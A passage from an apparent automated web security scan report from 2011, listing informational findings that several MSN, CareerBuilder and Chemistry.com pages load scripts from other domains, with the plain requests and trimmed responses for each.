Host:   http://movies.redacted
Path:   /paralleluniverse/5-demonic-possession-movies/story/across-the-universe/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /paralleluniverse/5-demonic-possession-movies/story/across-the-universe/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 49419
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=2f4ba9c5a4c34145987ce8f93d87a3b5; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Parallel U
...[SNIP]...
</link>

<script type=text/javascript language=javascript src="http://img1.video.s-redacted/v/js/MsnVideoUx.js"></script>
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
</DIV> <SCRIPT src="http://connect.facebook.net/en_US/all.js#appId=137011316310142&xfbml=1"></SCRIPT>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section --><script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

23.221. http://movies.redacted/paralleluniverse/dissecting-dark-knight-villains/story/across-the-universe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://movies.redacted
Path:   /paralleluniverse/dissecting-dark-knight-villains/story/across-the-universe/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /paralleluniverse/dissecting-dark-knight-villains/story/across-the-universe/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 52719
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=5ff4b00728d9439c8b366e737607dbdc; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Parallel U
...[SNIP]...
</link>

<script type=text/javascript language=javascript src="http://img1.video.s-redacted/v/js/MsnVideoUx.js"></script>
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
</DIV> <SCRIPT src="http://connect.facebook.net/en_US/all.js#appId=137011316310142&xfbml=1"></SCRIPT>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section --><script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

23.222. http://movies.redacted/the-rundown/the-guard/story_5/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://movies.redacted
Path:   /the-rundown/the-guard/story_5/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /the-rundown/the-guard/story_5/ HTTP/1.1
Host: movies.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 65403
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=423319e9829a41ada11054b6866c7b97; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:48:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   MSN Movies
...[SNIP]...
</style>
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section --><script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

23.223. http://msn.careerbuilder.com/Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.careerbuilder.com
Path:   /Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Article/MSN-1302-Workplace-Issues-Excuse-Free-Time-Off/ HTTP/1.1
Host: msn.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 58233
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=217c15685a7947bc834d222ac5644fdb-349642135-XJ-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X1974D75CFDC14C842A95BF216FF78EBA0B15DE7242A948C767593FFCBD9946DC3EE96BBC153A559E56DD81A338B99D40F; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:48:55 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEARWEB50
Date: Sat, 29 Jan 2011 23:48:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   MSN Ca
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js"></script>
...[SNIP]...
<!--[if !IE]>-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js">
</script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/voodoo/js/9/core.js "></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/core.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>
<script type="text/javascript" src="http://ads1.redacted/library/dap.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<img id="ctag" width="1" height="1" alt="" src="http://c.redacted/c.gif?di=15128&amp;pi=7327&amp;ps=45019&amp;tp=http://specials.redacted/mopsdk/standard/careers/msnshell.aspx&amp;rf=" />

<script type="text/javascript" src="http://hp.redacted/scr/op/ol-fdbkv3_r1.js"></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE5ODE5NTI3MjNkZH92Tm4x0BRcNLkPDvNpw+PPA2mW" />

   
<script src="http://img.icbdr.com/Common/js/AJAXLibs/System.Web.Extensions/3.5.0.0/3.5.30729.196/MicrosoftAjax.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/cbatlascore.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/msnviewarticle.js" type="text/javascript"></script>
...[SNIP]...
<!-- End comScore Tag -->

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/6/linktracking.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js"></script>
...[SNIP]...

23.224. http://msn.careerbuilder.com/Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.careerbuilder.com
Path:   /Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Article/MSN-1391-Workplace-Issues-Nine-Questions-You-Should-Ask-Your-Boss/ HTTP/1.1
Host: msn.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 60802
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=1376ce83848c458bad9f9645f4c3cfa3-349642136-XH-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X1974D75CFDC14C842F532F2B54CCD51E8D85817405B60EDB414DD584DBAE145C363A33CFCCCD28ABE3843C2AB1513C2FD; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:48:55 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEARWEB48
Date: Sat, 29 Jan 2011 23:48:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   MSN Ca
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js"></script>
...[SNIP]...
<!--[if !IE]>-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js">
</script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/voodoo/js/9/core.js "></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/core.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>
<script type="text/javascript" src="http://ads1.redacted/library/dap.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<img id="ctag" width="1" height="1" alt="" src="http://c.redacted/c.gif?di=15128&amp;pi=7327&amp;ps=45019&amp;tp=http://specials.redacted/mopsdk/standard/careers/msnshell.aspx&amp;rf=" />

<script type="text/javascript" src="http://hp.redacted/scr/op/ol-fdbkv3_r1.js"></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE5ODE5NTI3MjNkZH92Tm4x0BRcNLkPDvNpw+PPA2mW" />

   
<script src="http://img.icbdr.com/Common/js/AJAXLibs/System.Web.Extensions/3.5.0.0/3.5.30729.196/MicrosoftAjax.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/cbatlascore.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/msnviewarticle.js" type="text/javascript"></script>
...[SNIP]...
<!-- End comScore Tag -->

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/6/linktracking.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js"></script>
...[SNIP]...

23.225. http://msn.careerbuilder.com/Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.careerbuilder.com
Path:   /Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Article/MSN-1951-Job-Search-Get-Paid-to-Socially-Network/ HTTP/1.1
Host: msn.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61729
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=395818babba7496ca7f1ec46d56b6afc-349642127-XB-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X1974D75CFDC14C8425FF500443C942BAF241B9E407CBF4C42B5FD4C39911286DBFFBA30E2FAA02C46E8E850F0AD333FE8; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:48:47 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR42
Date: Sat, 29 Jan 2011 23:48:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   MSN Ca
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js"></script>
...[SNIP]...
<!--[if !IE]>-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js">
</script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/voodoo/js/9/core.js "></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/core.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>
<script type="text/javascript" src="http://ads1.redacted/library/dap.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<img id="ctag" width="1" height="1" alt="" src="http://c.redacted/c.gif?di=15128&amp;pi=7327&amp;ps=45019&amp;tp=http://specials.redacted/mopsdk/standard/careers/msnshell.aspx&amp;rf=" />

<script type="text/javascript" src="http://hp.redacted/scr/op/ol-fdbkv3_r1.js"></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE5ODE5NTI3MjNkZH92Tm4x0BRcNLkPDvNpw+PPA2mW" />

   
<script src="http://img.icbdr.com/Common/js/AJAXLibs/System.Web.Extensions/3.5.0.0/3.5.30729.196/MicrosoftAjax.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/cbatlascore.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/msnviewarticle.js" type="text/javascript"></script>
...[SNIP]...
<!-- End comScore Tag -->

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/6/linktracking.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js"></script>
...[SNIP]...

23.226. http://msn.careerbuilder.com/Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.careerbuilder.com
Path:   /Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Article/MSN-2469-Job-Search-Job-advice-that-was-true-20-years-ago-150-but-not-today/ HTTP/1.1
Host: msn.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 60120
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=3eb01fb472e34dfbb522cdac313c9679-349642137-w6-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X1974D75CFDC14C84271DBE1DDB3CC2075D4566E934132B9FE8F5A3AD8D64E2A0E08564952FD43F1D0830940A7662B16DF; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:48:56 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR6
Date: Sat, 29 Jan 2011 23:48:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   MSN Ca
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js"></script>
...[SNIP]...
<!--[if !IE]>-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js">
</script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/voodoo/js/9/core.js "></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/core.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>
<script type="text/javascript" src="http://ads1.redacted/library/dap.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<img id="ctag" width="1" height="1" alt="" src="http://c.redacted/c.gif?di=15128&amp;pi=7327&amp;ps=45019&amp;tp=http://specials.redacted/mopsdk/standard/careers/msnshell.aspx&amp;rf=" />

<script type="text/javascript" src="http://hp.redacted/scr/op/ol-fdbkv3_r1.js"></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE5ODE5NTI3MjNkZH92Tm4x0BRcNLkPDvNpw+PPA2mW" />

   
<script src="http://img.icbdr.com/Common/js/AJAXLibs/System.Web.Extensions/3.5.0.0/3.5.30729.196/MicrosoftAjax.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/cbatlascore.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/msnviewarticle.js" type="text/javascript"></script>
...[SNIP]...
<!-- End comScore Tag -->

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/6/linktracking.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js"></script>
...[SNIP]...

23.227. http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.careerbuilder.com
Path:   /jobseeker/jobs/jobResults.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /jobseeker/jobs/jobResults.aspx HTTP/1.1
Host: msn.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 186049
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: jobresults.aspx:mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=fce2ee8d67554dafa8996a80449bf770-349642143-XI-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X1974D75CFDC14C842AF27C9499CC36681A09DA126FC89CDE67D6CB317A39CA4DEA45CDDE40FA597B269AF1D1F84882078; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:49:02 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEARWEB49
Date: Sat, 29 Jan 2011 23:49:02 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Job Se
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js"></script>
...[SNIP]...
<!--[if !IE]>-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js">
</script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/voodoo/js/9/core.js "></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/core.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>
<script type="text/javascript" src="http://ads1.redacted/library/dap.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<img id="ctag" width="1" height="1" alt="" src="http://c.redacted/c.gif?di=15128&amp;pi=7327&amp;ps=45019&amp;tp=http://specials.redacted/mopsdk/standard/careers/msnshell.aspx&amp;rf=" />

<script type="text/javascript" src="http://hp.redacted/scr/op/ol-fdbkv3_r1.js"></script>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTIxNDQwNTU4NzVkZDmlxXesGnVfzlHjl1k0XgfRTK6B" />

   
<script src="http://img.icbdr.com/Common/js/AJAXLibs/System.Web.Extensions/3.5.0.0/3.5.30729.196/MicrosoftAjax.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/cbatlascore.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/jquery/jquery.cblibrary.min.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/jobsearching.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/jobseeker/ads/delayedad.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/popup.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/jobseeker/jobsearching.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/contentrequest.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.7/jquery-ui.min.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/autocomplete/cbautocomplete.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/jobseeker/joblistalternatingstylesfix.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/ajaxlogin.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/cbpopup.js" type="text/javascript"></script>
<script src="http://img.icbdr.com/v11.89/Common/js/clientsidetimer.js" type="text/javascript"></script>
...[SNIP]...
<!-- End comScore Tag -->

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/6/linktracking.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js"></script>
...[SNIP]...

23.228. http://msn.careerbuilder.com/msn/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.careerbuilder.com
Path:   /msn/default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /msn/default.aspx HTTP/1.1
Host: msn.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 67783
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=a1015ecbf19144f8ae5b365846c3aa34-349642122-XC-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X1974D75CFDC14C842F6D25E611765960B75D9DDF2256A2305A68D4A4064297C578D46EDCBE5C2F36EC73EE09F4CCCAF3E; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:48:42 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR43
Date: Sat, 29 Jan 2011 23:48:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Jobs &
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js"></script>
...[SNIP]...
<!--[if !IE]>-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js">
</script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/voodoo/js/9/core.js "></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/core.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>
<script type="text/javascript" src="http://ads1.redacted/library/dap.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<img id="ctag" width="1" height="1" alt="" src="http://c.redacted/c.gif?di=15128&amp;pi=7327&amp;ps=45019&amp;tp=http://specials.redacted/mopsdk/standard/careers/msnshell.aspx&amp;rf=" />

<script type="text/javascript" src="http://hp.redacted/scr/op/ol-fdbkv3_r1.js"></script>
...[SNIP]...
<!-- End comScore Tag -->

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/6/linktracking.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://blstj.redacted/br/chan/om/js/s_code.2010.12.13.js"></script>
...[SNIP]...

23.229. http://msn.chemistry.com/cp/landing/44762

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.chemistry.com
Path:   /cp/landing/44762

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cp/landing/44762 HTTP/1.1
Host: msn.chemistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:49:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: ETL=MID=d278fc94-dbd7-4a08-8cb6-0a6b0f3e8a2e; expires=Sun, 29-Jan-2012 23:49:11 GMT; path=/
Set-Cookie: Site=CCOUNT=1&CCDATE=1/29/2011; expires=Sun, 29-Jan-2012 23:49:11 GMT; path=/
Set-Cookie: Session=SID=99B544F5-72EC-4453-B766-5821666E8BC4&Th=11&TID=508259; path=/
Set-Cookie: UMID=c7fdb268-bc89-4e0a-b9a5-5a3cbc611c0e; expires=Sun, 29-Jan-2012 23:49:11 GMT; path=/
Set-Cookie: Tracking=; expires=Mon, 01-Jan-1900 06:00:00 GMT; path=/
Set-Cookie: Tracking=A=0&G=0&GS=0&UID=0&Reg=0&RegDt=1/1/1900&Sub=0&CC=0&SC=0&CIC=0&PC=0; expires=Sun, 29-Jan-2012 06:00:00 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28579

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="CPPageView_ctl00_head1">
<title>Chemistry a new online dating
...[SNIP]...
</script>

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/2/report.js"></script>

<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
</script>
       
<script type="text/javascript" src="http://blstj.redacted/br/chan/om/js/s_code.2010.09.15.js"></script>
...[SNIP]...
</div>
   
<script type="text/javascript" src="http://hp.redacted/scr/op/ol-fdbkv3_r1.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://blstj.redacted/br/om/js/lt/lt.js"></script>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</div>

   
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

23.230. http://msn.chemistry.com/cp/landing/57269

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.chemistry.com
Path:   /cp/landing/57269

